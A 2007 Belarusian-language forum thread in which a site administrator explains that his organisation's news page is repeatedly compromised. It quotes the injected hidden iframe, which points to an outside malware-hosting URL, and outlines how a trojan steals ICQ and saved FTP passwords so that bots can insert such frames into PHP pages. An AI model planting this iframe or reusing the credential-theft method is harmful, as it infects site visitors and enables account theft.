Page 1 of 1

нейкі вірус...

Posted: 10.06.2007 - 13:48
by князь жжош
Выбачайце спадарства. Я не знайшоў куды напісаць, таму пішу ў флейм...

Сёння, калі адчыніў старонку навінаў НРСМ, убачыў вось гэта:

Posted: 10.06.2007 - 13:50
by князь жжош
Там, як я зразумеў, аткака ідзе з іншага дамена, але чамусьці менавіта, калі адчыняеш старонку з навінамі НРСМ...

Posted: 10.06.2007 - 13:56
by Slaver
князь жжош, чорт-чорт-чорт! Зноў! Карацей, напрацягу некалькіх тыдняў нас ламаюць. Я нават ведаю як, але з-за праблемаў з хостэрамі, не магу зьмяніць нічога :(

Карацей, у апошні час тысячы сайтаў былі аднолькавым чынам падламаныя: ў зьмест старонак устаўляецца схаваны фрэйм, які спасылаецца на сайт зь вірусамі, траянамі і г.д. Тое самае ў апошні час адбываецца з нашым сайтам. Спачатку ён быў узламаны цалкам, а зараз проста ціха ўстаўляюць у код iframe, кшталту такога: Цытата:
<iframe src='http://www.alaqiq.net/quran/stata/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
З чым гэта зьвязана. У ЖЖ я пісаў, што пачаліся масавыя крадзежы асяк. Як апынулася, гэта зьвязана зь нейкім траянам, які адсылае паролі празь дзіркі аські, а яшчэ прычапляе іншыя паролі з сыстэмы, ў тым ліку для ftp (звычайна, файл Total Commander з дадзенымі). А там ужо боты праз ftp грукаюцца на сайты і аўтаматычна ўстаўляюць у коды старонак (звычайна index.php, login.php) сваі фрэймы і, такім чынам, заражаюць іншыя кампутары. Тое самае, напрыклад, было з «Тузінам Гітоў».

Posted: 10.06.2007 - 14:14
by князь жжош
Зразумела... =(

Posted: 10.06.2007 - 16:04
by Slaver
Карацей, калі напрацягу тыдня будуць працягвацца такія ўзломы, а з хостэрам я не наладжу сувязь, сайт будзе перанесены на новы сэрвар…

Posted: 10.06.2007 - 19:30
by Андрэй
Slaver wrote:Карацей, калі напрацягу тыдня будуць працягвацца такія ўзломы, а з хостэрам я не наладжу сувязь, сайт будзе перанесены на новы сэрвар…
а што за праблемы з хостэрам? не даюць зьмяніць пароль на ФТП?

Posted: 10.06.2007 - 19:35
by Slaver
Андрэй, у мяне связі няма зь імі. Усё праз Алёну. Але ня варта арганізацыйныя пытаньні выносіць сюды :)